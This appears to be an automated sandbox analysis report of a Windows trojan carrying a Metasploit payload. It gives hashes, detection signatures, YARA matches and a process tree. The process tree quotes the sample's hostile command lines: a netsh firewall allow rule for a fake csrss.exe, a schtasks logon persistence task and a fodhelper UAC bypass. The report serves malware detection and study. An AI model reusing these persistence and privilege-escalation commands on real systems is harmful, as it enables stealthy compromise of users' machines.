Play interactive tour

Edit tour

Windows Analysis Report 4t4y4r89UZ

Overview

General Information

Sample Name:	4t4y4r89UZ (renamed file extension from none to exe)
Analysis ID:	519673
MD5:	14c0d8425930ccec0566b04864a05670
SHA1:	07fd6746417c89239e8b4b272fa350c5dc41c580
SHA256:	fea538eff5bc9cd3970edda4b3ddfa0e72505b01dc207e47d8112074720fa05e
Tags:	32exetrojan
Infos:
Most interesting Screenshot:

Detection

Metasploit

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Yara detected Metasploit Payload

Multi AV Scanner detection for submitted file

Detected unpacking (overwrites its own PE header)

Sigma detected: Schedule system process

Detected unpacking (changes PE section rights)

Antivirus detection for URL or domain

Antivirus detection for dropped file

Multi AV Scanner detection for dropped file

Creates an autostart registry key pointing to binary in C:\Windows

Sigma detected: System File Execution Location Anomaly

Uses netsh to modify the Windows network and firewall settings

Found Tor onion address

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Uses shutdown.exe to shutdown or reboot the system

Changes security center settings (notifications, updates, antivirus, firewall)

Machine Learning detection for sample

Creates files in the system32 config directory

May modify the system service descriptor table (often done to hook functions)

Machine Learning detection for dropped file

Modifies the windows firewall

Performs DNS TXT record lookups

Drops executables to the windows directory (C:\Windows) and starts them

Sigma detected: Bypass UAC via Fodhelper.exe

Uses schtasks.exe or at.exe to add and modify task schedules

Drops PE files with benign system names

Uses 32bit PE files

Queries the volume information (name, serial number etc) of a device

Yara signature match

Antivirus or Machine Learning detection for unpacked file

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Creates files inside the system directory

PE file contains sections with non-standard names

Found potential string decryption / allocating functions

Sample execution stops while process was sleeping (likely an evasion)

Found dropped PE file which has not been started or loaded

Downloads executable code via HTTP

Enables debug privileges

Is looking for software installed on the system

Drops files with a non-matching file extension (content does not match file extension)

AV process strings found (often used to terminate AV products)

PE file does not import any functions

Sample file is different than original file name gathered from version info

PE file contains an invalid checksum

Drops PE files

Tries to load missing DLLs

Uses a known web browser user agent for HTTP communication

Drops PE files to the windows directory (C:\Windows)

Contains capabilities to detect virtual machines

PE / OLE file has an invalid certificate

Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)

Sigma detected: Netsh Port or Application Allowed

Sigma detected: Conhost Parent Process Executions

Creates a process in suspended mode (likely to inject code)

Classification

Process Tree

System is w10x64

4t4y4r89UZ.exe (PID: 5272 cmdline: "C:\Users\user\Desktop\4t4y4r89UZ.exe" MD5: 14C0D8425930CCEC0566B04864A05670)

4t4y4r89UZ.exe (PID: 5300 cmdline: C:\Users\user\Desktop\4t4y4r89UZ.exe MD5: 14C0D8425930CCEC0566B04864A05670)

cmd.exe (PID: 2012 cmdline: C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes" MD5: 4E2ACF4F8A396486AB4268C94A6A245F)

conhost.exe (PID: 7108 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

csrss.exe (PID: 916 cmdline: C:\Windows\rss\csrss.exe MD5: 14C0D8425930CCEC0566B04864A05670)

netsh.exe (PID: 7080 cmdline: netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes MD5: 98CC37BBF363A38834253E22C80A8F32)

csrss.exe (PID: 3192 cmdline: C:\Windows\rss\csrss.exe /305-305 MD5: 14C0D8425930CCEC0566B04864A05670)

schtasks.exe (PID: 4036 cmdline: schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F MD5: 838D346D1D28F00783B7A6C6BD03A0DA)

conhost.exe (PID: 4004 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

schtasks.exe (PID: 7076 cmdline: schtasks /delete /tn ScheduledUpdate /f MD5: 838D346D1D28F00783B7A6C6BD03A0DA)

conhost.exe (PID: 7100 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

mountvol.exe (PID: 5656 cmdline: mountvol B: /s MD5: 5C11B99E6D41403031CD946255E8A353)

conhost.exe (PID: 3012 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

mountvol.exe (PID: 2224 cmdline: mountvol B: /d MD5: 5C11B99E6D41403031CD946255E8A353)

conhost.exe (PID: 5800 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

mountvol.exe (PID: 5784 cmdline: mountvol B: /s MD5: 5C11B99E6D41403031CD946255E8A353)

conhost.exe (PID: 1956 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

mountvol.exe (PID: 7104 cmdline: mountvol B: /d MD5: 5C11B99E6D41403031CD946255E8A353)

conhost.exe (PID: 5108 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

shutdown.exe (PID: 5384 cmdline: shutdown -r -t 5 MD5: E2EB9CC0FE26E28406FB6F82F8E81B26)

conhost.exe (PID: 6932 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

svchost.exe (PID: 6436 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)

svchost.exe (PID: 4072 cmdline: C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService MD5: 32569E403279B3FD2EDB7EBD036273FA)

svchost.exe (PID: 6272 cmdline: c:\windows\system32\svchost.exe -k localservice -p -s CDPSvc MD5: 32569E403279B3FD2EDB7EBD036273FA)

svchost.exe (PID: 3076 cmdline: c:\windows\system32\svchost.exe -k networkservice -p -s DoSvc MD5: 32569E403279B3FD2EDB7EBD036273FA)

svchost.exe (PID: 6336 cmdline: C:\Windows\System32\svchost.exe -k NetworkService -p MD5: 32569E403279B3FD2EDB7EBD036273FA)

svchost.exe (PID: 6896 cmdline: c:\windows\system32\svchost.exe -k unistacksvcgroup MD5: 32569E403279B3FD2EDB7EBD036273FA)

SgrmBroker.exe (PID: 6784 cmdline: C:\Windows\system32\SgrmBroker.exe MD5: D3170A3F3A9626597EEE1888686E3EA6)

svchost.exe (PID: 6848 cmdline: c:\windows\system32\svchost.exe -k localservicenetworkrestricted -p -s wscsvc MD5: 32569E403279B3FD2EDB7EBD036273FA)

TrustedInstaller.exe (PID: 6756 cmdline: C:\Windows\servicing\TrustedInstaller.exe MD5: 4578046C54A954C917BB393B70BA0AEB)

csrss.exe (PID: 1240 cmdline: "C:\Windows\rss\csrss.exe" MD5: 14C0D8425930CCEC0566B04864A05670)

cmd.exe (PID: 7140 cmdline: C:\Windows\Sysnative\cmd.exe /C fodhelper MD5: 4E2ACF4F8A396486AB4268C94A6A245F)

conhost.exe (PID: 5580 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

fodhelper.exe (PID: 6256 cmdline: fodhelper MD5: 1D1F9E564472A9698F1BE3F9FEB9864B)

fodhelper.exe (PID: 5776 cmdline: "C:\Windows\system32\fodhelper.exe" MD5: 1D1F9E564472A9698F1BE3F9FEB9864B)

fodhelper.exe (PID: 6016 cmdline: "C:\Windows\system32\fodhelper.exe" MD5: 1D1F9E564472A9698F1BE3F9FEB9864B)

csrss.exe (PID: 5360 cmdline: "C:\Windows\rss\csrss.exe" MD5: 14C0D8425930CCEC0566B04864A05670)

svchost.exe (PID: 6580 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)

csrss.exe (PID: 7108 cmdline: C:\Windows\rss\csrss.exe MD5: 14C0D8425930CCEC0566B04864A05670)

csrss.exe (PID: 3016 cmdline: "C:\Windows\rss\csrss.exe" MD5: 14C0D8425930CCEC0566B04864A05670)

cmd.exe (PID: 4400 cmdline: C:\Windows\Sysnative\cmd.exe /C fodhelper MD5: 4E2ACF4F8A396486AB4268C94A6A245F)

conhost.exe (PID: 3212 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

fodhelper.exe (PID: 2528 cmdline: fodhelper MD5: 1D1F9E564472A9698F1BE3F9FEB9864B)

fodhelper.exe (PID: 3932 cmdline: "C:\Windows\system32\fodhelper.exe" MD5: 1D1F9E564472A9698F1BE3F9FEB9864B)

svchost.exe (PID: 6488 cmdline: C:\Windows\System32\svchost.exe -k WerSvcGroup MD5: 32569E403279B3FD2EDB7EBD036273FA)

cleanup

Malware Configuration

No configs have been found

Yara Overview

Memory Dumps

Source	Rule	Description	Author
0000000A.00000003.299643807.0000000005C5A000.00000004.00000001.sdmp	JoeSecurity_MetasploitPayload_3	Yara detected Metasploit Payload	Joe Security
0000002A.00000002.376433226.0000000000400000.00000040.00020000.sdmp	JoeSecurity_MetasploitPayload_3	Yara detected Metasploit Payload	Joe Security
00000032.00000003.393407437.000000000638A000.00000004.00000001.sdmp	JoeSecurity_MetasploitPayload_3	Yara detected Metasploit Payload	Joe Security
0000000E.00000003.327032138.000000000638A000.00000004.00000001.sdmp	JoeSecurity_MetasploitPayload_3	Yara detected Metasploit Payload	Joe Security
00000022.00000003.354921763.000000000638A000.00000004.00000001.sdmp	JoeSecurity_MetasploitPayload_3	Yara detected Metasploit Payload	Joe Security
00000032.00000002.398055163.0000000000400000.00000040.00020000.sdmp	JoeSecurity_MetasploitPayload_3	Yara detected Metasploit Payload	Joe Security
00000000.00000003.284369390.0000000005CCA000.00000004.00000001.sdmp	JoeSecurity_MetasploitPayload_3	Yara detected Metasploit Payload	Joe Security
00000010.00000003.333119737.000000000638A000.00000004.00000001.sdmp	JoeSecurity_MetasploitPayload_3	Yara detected Metasploit Payload	Joe Security
00000010.00000002.358316255.0000000000400000.00000040.00020000.sdmp	JoeSecurity_MetasploitPayload_3	Yara detected Metasploit Payload	Joe Security
00000017.00000003.358520385.000000000638A000.00000004.00000001.sdmp	JoeSecurity_MetasploitPayload_3	Yara detected Metasploit Payload	Joe Security
0000000E.00000002.546482907.0000000000400000.00000040.00020000.sdmp	JoeSecurity_MetasploitPayload_3	Yara detected Metasploit Payload	Joe Security
0000000E.00000002.554614867.0000000005700000.00000040.00000001.sdmp	JoeSecurity_MetasploitPayload_3	Yara detected Metasploit Payload	Joe Security
0000002A.00000003.364603703.000000000638A000.00000004.00000001.sdmp	JoeSecurity_MetasploitPayload_3	Yara detected Metasploit Payload	Joe Security
00000022.00000002.388262330.0000000005700000.00000040.00000001.sdmp	JoeSecurity_MetasploitPayload_3	Yara detected Metasploit Payload	Joe Security
00000010.00000002.365686923.0000000005700000.00000040.00000001.sdmp	JoeSecurity_MetasploitPayload_3	Yara detected Metasploit Payload	Joe Security
00000032.00000002.402547208.0000000005700000.00000040.00000001.sdmp	JoeSecurity_MetasploitPayload_3	Yara detected Metasploit Payload	Joe Security
00000017.00000002.387694922.0000000000400000.00000040.00020000.sdmp	JoeSecurity_MetasploitPayload_3	Yara detected Metasploit Payload	Joe Security
0000002A.00000002.387983179.0000000005700000.00000040.00000001.sdmp	JoeSecurity_MetasploitPayload_3	Yara detected Metasploit Payload	Joe Security
0000000A.00000002.317378119.0000000000400000.00000040.00020000.sdmp	JoeSecurity_MetasploitPayload_3	Yara detected Metasploit Payload	Joe Security
00000000.00000002.295699517.0000000005040000.00000040.00000001.sdmp	JoeSecurity_MetasploitPayload_3	Yara detected Metasploit Payload	Joe Security
00000000.00000002.291152945.0000000000400000.00000040.00020000.sdmp	JoeSecurity_MetasploitPayload_3	Yara detected Metasploit Payload	Joe Security
00000022.00000002.377614000.0000000000400000.00000040.00020000.sdmp	JoeSecurity_MetasploitPayload_3	Yara detected Metasploit Payload	Joe Security
00000017.00000002.393659101.0000000005700000.00000040.00000001.sdmp	JoeSecurity_MetasploitPayload_3	Yara detected Metasploit Payload	Joe Security
0000000A.00000002.321014783.0000000004FD0000.00000040.00000001.sdmp	JoeSecurity_MetasploitPayload_3	Yara detected Metasploit Payload	Joe Security
Click to see the 19 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
0.2.4t4y4r89UZ.exe.9a56e0.2.raw.unpack	MAL_ME_RawDisk_Agent_Jan20_2	Detects suspicious malware using ElRawDisk	Florian Roth	0x444b8:$s2: The Magic Word! 0x505f8:$s2: The Magic Word! 0x44818:$s3: Software\Oracle\VirtualBox 0x444a7:$sc1: 00 5C 00 5C 00 2E 00 5C 00 25 00 73
23.2.csrss.exe.9ab080.0.raw.unpack	MAL_ME_RawDisk_Agent_Jan20_2	Detects suspicious malware using ElRawDisk	Florian Roth	0x3eb18:$s2: The Magic Word! 0x4ac58:$s2: The Magic Word! 0x3ee78:$s3: Software\Oracle\VirtualBox 0x3eb07:$sc1: 00 5C 00 5C 00 2E 00 5C 00 25 00 73
23.3.csrss.exe.65540e0.3.raw.unpack	MAL_ME_RawDisk_Agent_Jan20_2	Detects suspicious malware using ElRawDisk	Florian Roth	0x444b8:$s2: The Magic Word! 0x505f8:$s2: The Magic Word! 0x44818:$s3: Software\Oracle\VirtualBox 0x444a7:$sc1: 00 5C 00 5C 00 2E 00 5C 00 25 00 73
14.3.csrss.exe.655bce0.3.raw.unpack	MAL_ME_RawDisk_Agent_Jan20_2	Detects suspicious malware using ElRawDisk	Florian Roth	0x3c8b8:$s2: The Magic Word! 0x489f8:$s2: The Magic Word! 0x3cc18:$s3: Software\Oracle\VirtualBox 0x3c8a7:$sc1: 00 5C 00 5C 00 2E 00 5C 00 25 00 73
10.2.4t4y4r89UZ.exe.9ad2e0.0.raw.unpack	MAL_ME_RawDisk_Agent_Jan20_2	Detects suspicious malware using ElRawDisk	Florian Roth	0x3c8b8:$s2: The Magic Word! 0x489f8:$s2: The Magic Word! 0x3cc18:$s3: Software\Oracle\VirtualBox 0x3c8a7:$sc1: 00 5C 00 5C 00 2E 00 5C 00 25 00 73
50.2.csrss.exe.5ca4f30.11.raw.unpack	MAL_ME_RawDisk_Agent_Jan20_2	Detects suspicious malware using ElRawDisk	Florian Roth	0x444b8:$s2: The Magic Word! 0x505f8:$s2: The Magic Word! 0x44818:$s3: Software\Oracle\VirtualBox 0x444a7:$sc1: 00 5C 00 5C 00 2E 00 5C 00 25 00 73
0.2.4t4y4r89UZ.exe.9ad2e0.0.raw.unpack	MAL_ME_RawDisk_Agent_Jan20_2	Detects suspicious malware using ElRawDisk	Florian Roth	0x3c8b8:$s2: The Magic Word! 0x489f8:$s2: The Magic Word! 0x3cc18:$s3: Software\Oracle\VirtualBox 0x3c8a7:$sc1: 00 5C 00 5C 00 2E 00 5C 00 25 00 73
10.3.4t4y4r89UZ.exe.5e2bce0.2.raw.unpack	MAL_ME_RawDisk_Agent_Jan20_2	Detects suspicious malware using ElRawDisk	Florian Roth	0x3c8b8:$s2: The Magic Word! 0x489f8:$s2: The Magic Word! 0x3cc18:$s3: Software\Oracle\VirtualBox 0x3c8a7:$sc1: 00 5C 00 5C 00 2E 00 5C 00 25 00 73
16.2.csrss.exe.9ab080.0.raw.unpack	MAL_ME_RawDisk_Agent_Jan20_2	Detects suspicious malware using ElRawDisk	Florian Roth	0x3eb18:$s2: The Magic Word! 0x4ac58:$s2: The Magic Word! 0x3ee78:$s3: Software\Oracle\VirtualBox 0x3eb07:$sc1: 00 5C 00 5C 00 2E 00 5C 00 25 00 73
16.3.csrss.exe.65540e0.1.raw.unpack	MAL_ME_RawDisk_Agent_Jan20_2	Detects suspicious malware using ElRawDisk	Florian Roth	0x444b8:$s2: The Magic Word! 0x505f8:$s2: The Magic Word! 0x44818:$s3: Software\Oracle\VirtualBox 0x444a7:$sc1: 00 5C 00 5C 00 2E 00 5C 00 25 00 73
34.2.csrss.exe.9ab080.0.raw.unpack	MAL_ME_RawDisk_Agent_Jan20_2	Detects suspicious malware using ElRawDisk	Florian Roth	0x3eb18:$s2: The Magic Word! 0x4ac58:$s2: The Magic Word! 0x3ee78:$s3: Software\Oracle\VirtualBox 0x3eb07:$sc1: 00 5C 00 5C 00 2E 00 5C 00 25 00 73
42.3.csrss.exe.655bce0.2.raw.unpack	MAL_ME_RawDisk_Agent_Jan20_2	Detects suspicious malware using ElRawDisk	Florian Roth	0x3c8b8:$s2: The Magic Word! 0x489f8:$s2: The Magic Word! 0x3cc18:$s3: Software\Oracle\VirtualBox 0x3c8a7:$sc1: 00 5C 00 5C 00 2E 00 5C 00 25 00 73
0.2.4t4y4r89UZ.exe.55e4f30.9.raw.unpack	MAL_ME_RawDisk_Agent_Jan20_2	Detects suspicious malware using ElRawDisk	Florian Roth	0x444b8:$s2: The Magic Word! 0x505f8:$s2: The Magic Word! 0x44818:$s3: Software\Oracle\VirtualBox 0x444a7:$sc1: 00 5C 00 5C 00 2E 00 5C 00 25 00 73
34.2.csrss.exe.9ad2e0.2.raw.unpack	MAL_ME_RawDisk_Agent_Jan20_2	Detects suspicious malware using ElRawDisk	Florian Roth	0x3c8b8:$s2: The Magic Word! 0x489f8:$s2: The Magic Word! 0x3cc18:$s3: Software\Oracle\VirtualBox 0x3c8a7:$sc1: 00 5C 00 5C 00 2E 00 5C 00 25 00 73
42.2.csrss.exe.5caa8d0.9.raw.unpack	MAL_ME_RawDisk_Agent_Jan20_2	Detects suspicious malware using ElRawDisk	Florian Roth	0x3eb18:$s2: The Magic Word! 0x4ac58:$s2: The Magic Word! 0x3ee78:$s3: Software\Oracle\VirtualBox 0x3eb07:$sc1: 00 5C 00 5C 00 2E 00 5C 00 25 00 73
0.3.4t4y4r89UZ.exe.5e99a80.1.raw.unpack	MAL_ME_RawDisk_Agent_Jan20_2	Detects suspicious malware using ElRawDisk	Florian Roth	0x3eb18:$s2: The Magic Word! 0x4ac58:$s2: The Magic Word! 0x3ee78:$s3: Software\Oracle\VirtualBox 0x3eb07:$sc1: 00 5C 00 5C 00 2E 00 5C 00 25 00 73
14.2.csrss.exe.9a56e0.3.raw.unpack	MAL_ME_RawDisk_Agent_Jan20_2	Detects suspicious malware using ElRawDisk	Florian Roth	0x444b8:$s2: The Magic Word! 0x505f8:$s2: The Magic Word! 0x44818:$s3: Software\Oracle\VirtualBox 0x444a7:$sc1: 00 5C 00 5C 00 2E 00 5C 00 25 00 73
23.2.csrss.exe.5ca4f30.9.raw.unpack	MAL_ME_RawDisk_Agent_Jan20_2	Detects suspicious malware using ElRawDisk	Florian Roth	0x444b8:$s2: The Magic Word! 0x505f8:$s2: The Magic Word! 0x44818:$s3: Software\Oracle\VirtualBox 0x444a7:$sc1: 00 5C 00 5C 00 2E 00 5C 00 25 00 73
10.3.4t4y4r89UZ.exe.5e29a80.1.raw.unpack	MAL_ME_RawDisk_Agent_Jan20_2	Detects suspicious malware using ElRawDisk	Florian Roth	0x3eb18:$s2: The Magic Word! 0x4ac58:$s2: The Magic Word! 0x3ee78:$s3: Software\Oracle\VirtualBox 0x3eb07:$sc1: 00 5C 00 5C 00 2E 00 5C 00 25 00 73
14.2.csrss.exe.5caa8d0.9.raw.unpack	MAL_ME_RawDisk_Agent_Jan20_2	Detects suspicious malware using ElRawDisk	Florian Roth	0x3eb18:$s2: The Magic Word! 0x4ac58:$s2: The Magic Word! 0x3ee78:$s3: Software\Oracle\VirtualBox 0x3eb07:$sc1: 00 5C 00 5C 00 2E 00 5C 00 25 00 73
23.3.csrss.exe.6559a80.1.raw.unpack	MAL_ME_RawDisk_Agent_Jan20_2	Detects suspicious malware using ElRawDisk	Florian Roth	0x3eb18:$s2: The Magic Word! 0x4ac58:$s2: The Magic Word! 0x3ee78:$s3: Software\Oracle\VirtualBox 0x3eb07:$sc1: 00 5C 00 5C 00 2E 00 5C 00 25 00 73
42.2.csrss.exe.9ab080.2.raw.unpack	MAL_ME_RawDisk_Agent_Jan20_2	Detects suspicious malware using ElRawDisk	Florian Roth	0x3eb18:$s2: The Magic Word! 0x4ac58:$s2: The Magic Word! 0x3ee78:$s3: Software\Oracle\VirtualBox 0x3eb07:$sc1: 00 5C 00 5C 00 2E 00 5C 00 25 00 73
10.3.4t4y4r89UZ.exe.5e240e0.3.raw.unpack	MAL_ME_RawDisk_Agent_Jan20_2	Detects suspicious malware using ElRawDisk	Florian Roth	0x444b8:$s2: The Magic Word! 0x505f8:$s2: The Magic Word! 0x44818:$s3: Software\Oracle\VirtualBox 0x444a7:$sc1: 00 5C 00 5C 00 2E 00 5C 00 25 00 73
34.2.csrss.exe.5ca4f30.9.raw.unpack	MAL_ME_RawDisk_Agent_Jan20_2	Detects suspicious malware using ElRawDisk	Florian Roth	0x444b8:$s2: The Magic Word! 0x505f8:$s2: The Magic Word! 0x44818:$s3: Software\Oracle\VirtualBox 0x444a7:$sc1: 00 5C 00 5C 00 2E 00 5C 00 25 00 73
10.2.4t4y4r89UZ.exe.5574f30.11.raw.unpack	MAL_ME_RawDisk_Agent_Jan20_2	Detects suspicious malware using ElRawDisk	Florian Roth	0x444b8:$s2: The Magic Word! 0x505f8:$s2: The Magic Word! 0x44818:$s3: Software\Oracle\VirtualBox 0x444a7:$sc1: 00 5C 00 5C 00 2E 00 5C 00 25 00 73
16.3.csrss.exe.655bce0.2.raw.unpack	MAL_ME_RawDisk_Agent_Jan20_2	Detects suspicious malware using ElRawDisk	Florian Roth	0x3c8b8:$s2: The Magic Word! 0x489f8:$s2: The Magic Word! 0x3cc18:$s3: Software\Oracle\VirtualBox 0x3c8a7:$sc1: 00 5C 00 5C 00 2E 00 5C 00 25 00 73
23.3.csrss.exe.655bce0.2.raw.unpack	MAL_ME_RawDisk_Agent_Jan20_2	Detects suspicious malware using ElRawDisk	Florian Roth	0x3c8b8:$s2: The Magic Word! 0x489f8:$s2: The Magic Word! 0x3cc18:$s3: Software\Oracle\VirtualBox 0x3c8a7:$sc1: 00 5C 00 5C 00 2E 00 5C 00 25 00 73
14.2.csrss.exe.9ad2e0.2.raw.unpack	MAL_ME_RawDisk_Agent_Jan20_2	Detects suspicious malware using ElRawDisk	Florian Roth	0x3c8b8:$s2: The Magic Word! 0x489f8:$s2: The Magic Word! 0x3cc18:$s3: Software\Oracle\VirtualBox 0x3c8a7:$sc1: 00 5C 00 5C 00 2E 00 5C 00 25 00 73
34.3.csrss.exe.6559a80.1.raw.unpack	MAL_ME_RawDisk_Agent_Jan20_2	Detects suspicious malware using ElRawDisk	Florian Roth	0x3eb18:$s2: The Magic Word! 0x4ac58:$s2: The Magic Word! 0x3ee78:$s3: Software\Oracle\VirtualBox 0x3eb07:$sc1: 00 5C 00 5C 00 2E 00 5C 00 25 00 73
14.2.csrss.exe.9ab080.1.raw.unpack	MAL_ME_RawDisk_Agent_Jan20_2	Detects suspicious malware using ElRawDisk	Florian Roth	0x3eb18:$s2: The Magic Word! 0x4ac58:$s2: The Magic Word! 0x3ee78:$s3: Software\Oracle\VirtualBox 0x3eb07:$sc1: 00 5C 00 5C 00 2E 00 5C 00 25 00 73
50.2.csrss.exe.9ad2e0.3.raw.unpack	MAL_ME_RawDisk_Agent_Jan20_2	Detects suspicious malware using ElRawDisk	Florian Roth	0x3c8b8:$s2: The Magic Word! 0x489f8:$s2: The Magic Word! 0x3cc18:$s3: Software\Oracle\VirtualBox 0x3c8a7:$sc1: 00 5C 00 5C 00 2E 00 5C 00 25 00 73
16.2.csrss.exe.400000.1.raw.unpack	JoeSecurity_MetasploitPayload_3	Yara detected Metasploit Payload	Joe Security
10.2.4t4y4r89UZ.exe.9a56e0.1.raw.unpack	MAL_ME_RawDisk_Agent_Jan20_2	Detects suspicious malware using ElRawDisk	Florian Roth	0x444b8:$s2: The Magic Word! 0x505f8:$s2: The Magic Word! 0x44818:$s3: Software\Oracle\VirtualBox 0x444a7:$sc1: 00 5C 00 5C 00 2E 00 5C 00 25 00 73
42.2.csrss.exe.5ca4f30.10.raw.unpack	MAL_ME_RawDisk_Agent_Jan20_2	Detects suspicious malware using ElRawDisk	Florian Roth	0x444b8:$s2: The Magic Word! 0x505f8:$s2: The Magic Word! 0x44818:$s3: Software\Oracle\VirtualBox 0x444a7:$sc1: 00 5C 00 5C 00 2E 00 5C 00 25 00 73
50.2.csrss.exe.400000.0.raw.unpack	JoeSecurity_MetasploitPayload_3	Yara detected Metasploit Payload	Joe Security
34.2.csrss.exe.400000.3.raw.unpack	JoeSecurity_MetasploitPayload_3	Yara detected Metasploit Payload	Joe Security
10.2.4t4y4r89UZ.exe.4fd0e50.9.raw.unpack	JoeSecurity_MetasploitPayload_3	Yara detected Metasploit Payload	Joe Security
34.2.csrss.exe.9a56e0.1.raw.unpack	MAL_ME_RawDisk_Agent_Jan20_2	Detects suspicious malware using ElRawDisk	Florian Roth	0x444b8:$s2: The Magic Word! 0x505f8:$s2: The Magic Word! 0x44818:$s3: Software\Oracle\VirtualBox 0x444a7:$sc1: 00 5C 00 5C 00 2E 00 5C 00 25 00 73
50.3.csrss.exe.65540e0.2.raw.unpack	MAL_ME_RawDisk_Agent_Jan20_2	Detects suspicious malware using ElRawDisk	Florian Roth	0x444b8:$s2: The Magic Word! 0x505f8:$s2: The Magic Word! 0x44818:$s3: Software\Oracle\VirtualBox 0x444a7:$sc1: 00 5C 00 5C 00 2E 00 5C 00 25 00 73
42.2.csrss.exe.400000.1.raw.unpack	JoeSecurity_MetasploitPayload_3	Yara detected Metasploit Payload	Joe Security
14.2.csrss.exe.5700e50.11.raw.unpack	JoeSecurity_MetasploitPayload_3	Yara detected Metasploit Payload	Joe Security
10.2.4t4y4r89UZ.exe.557a8d0.10.raw.unpack	MAL_ME_RawDisk_Agent_Jan20_2	Detects suspicious malware using ElRawDisk	Florian Roth	0x3eb18:$s2: The Magic Word! 0x4ac58:$s2: The Magic Word! 0x3ee78:$s3: Software\Oracle\VirtualBox 0x3eb07:$sc1: 00 5C 00 5C 00 2E 00 5C 00 25 00 73
16.2.csrss.exe.9ad2e0.3.raw.unpack	MAL_ME_RawDisk_Agent_Jan20_2	Detects suspicious malware using ElRawDisk	Florian Roth	0x3c8b8:$s2: The Magic Word! 0x489f8:$s2: The Magic Word! 0x3cc18:$s3: Software\Oracle\VirtualBox 0x3c8a7:$sc1: 00 5C 00 5C 00 2E 00 5C 00 25 00 73
42.3.csrss.exe.65540e0.1.raw.unpack	MAL_ME_RawDisk_Agent_Jan20_2	Detects suspicious malware using ElRawDisk	Florian Roth	0x444b8:$s2: The Magic Word! 0x505f8:$s2: The Magic Word! 0x44818:$s3: Software\Oracle\VirtualBox 0x444a7:$sc1: 00 5C 00 5C 00 2E 00 5C 00 25 00 73
50.3.csrss.exe.5fb0000.0.unpack	JoeSecurity_MetasploitPayload_3	Yara detected Metasploit Payload	Joe Security
42.2.csrss.exe.9ad2e0.0.raw.unpack	MAL_ME_RawDisk_Agent_Jan20_2	Detects suspicious malware using ElRawDisk	Florian Roth	0x3c8b8:$s2: The Magic Word! 0x489f8:$s2: The Magic Word! 0x3cc18:$s3: Software\Oracle\VirtualBox 0x3c8a7:$sc1: 00 5C 00 5C 00 2E 00 5C 00 25 00 73
16.2.csrss.exe.9a56e0.2.raw.unpack	MAL_ME_RawDisk_Agent_Jan20_2	Detects suspicious malware using ElRawDisk	Florian Roth	0x444b8:$s2: The Magic Word! 0x505f8:$s2: The Magic Word! 0x44818:$s3: Software\Oracle\VirtualBox 0x444a7:$sc1: 00 5C 00 5C 00 2E 00 5C 00 25 00 73
14.2.csrss.exe.5700e50.11.unpack	JoeSecurity_MetasploitPayload_3	Yara detected Metasploit Payload	Joe Security
34.2.csrss.exe.5700e50.11.unpack	JoeSecurity_MetasploitPayload_3	Yara detected Metasploit Payload	Joe Security
10.2.4t4y4r89UZ.exe.4fd0e50.9.unpack	JoeSecurity_MetasploitPayload_3	Yara detected Metasploit Payload	Joe Security
34.2.csrss.exe.5caa8d0.10.raw.unpack	MAL_ME_RawDisk_Agent_Jan20_2	Detects suspicious malware using ElRawDisk	Florian Roth	0x3eb18:$s2: The Magic Word! 0x4ac58:$s2: The Magic Word! 0x3ee78:$s3: Software\Oracle\VirtualBox 0x3eb07:$sc1: 00 5C 00 5C 00 2E 00 5C 00 25 00 73
42.2.csrss.exe.9a56e0.3.raw.unpack	MAL_ME_RawDisk_Agent_Jan20_2	Detects suspicious malware using ElRawDisk	Florian Roth	0x444b8:$s2: The Magic Word! 0x505f8:$s2: The Magic Word! 0x44818:$s3: Software\Oracle\VirtualBox 0x444a7:$sc1: 00 5C 00 5C 00 2E 00 5C 00 25 00 73
0.3.4t4y4r89UZ.exe.5e9bce0.2.raw.unpack	MAL_ME_RawDisk_Agent_Jan20_2	Detects suspicious malware using ElRawDisk	Florian Roth	0x3c8b8:$s2: The Magic Word! 0x489f8:$s2: The Magic Word! 0x3cc18:$s3: Software\Oracle\VirtualBox 0x3c8a7:$sc1: 00 5C 00 5C 00 2E 00 5C 00 25 00 73
50.2.csrss.exe.400000.0.unpack	JoeSecurity_MetasploitPayload_3	Yara detected Metasploit Payload	Joe Security
50.2.csrss.exe.5caa8d0.10.raw.unpack	MAL_ME_RawDisk_Agent_Jan20_2	Detects suspicious malware using ElRawDisk	Florian Roth	0x3eb18:$s2: The Magic Word! 0x4ac58:$s2: The Magic Word! 0x3ee78:$s3: Software\Oracle\VirtualBox 0x3eb07:$sc1: 00 5C 00 5C 00 2E 00 5C 00 25 00 73
